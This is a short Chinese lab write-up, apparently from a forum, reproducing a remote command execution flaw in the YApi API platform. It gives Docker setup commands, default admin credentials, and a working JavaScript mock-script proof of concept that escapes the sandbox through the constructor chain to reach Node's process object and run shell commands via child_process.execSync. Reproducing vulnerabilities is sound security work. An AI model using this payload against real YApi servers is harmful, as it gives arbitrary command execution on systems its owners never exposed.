Yapi远程命令执行漏洞复现
环境搭建
docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi
mkdir -p /home/data/yapi/mongodata
docker run –restart always -v /home/data/yapi/mongodata:/data/db -d –name yapimongo mongo
docker run -it –rm –link yapimongo:mongo –entrypoint npm –workdir /api/vendors registry.cn-hangzhou.aliyuncs.com/anoy/yapi run install-server
docker run -d –restart=always –name yapi –link yapimongo:mongo –workdir /api/vendors -p 3001:3000 registry.cn-hangzhou.aliyuncs.com/anoy/yapi server/app.js
启动成功之后。访问IP:3001
初始化管理员账号成功,账号名:”admin@admin.com”,密码:”ymfe.org”
漏洞复现
新建项目
然后选择设置全局的mock脚本,设置命令POC
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
访问URL
请登录后查看回复内容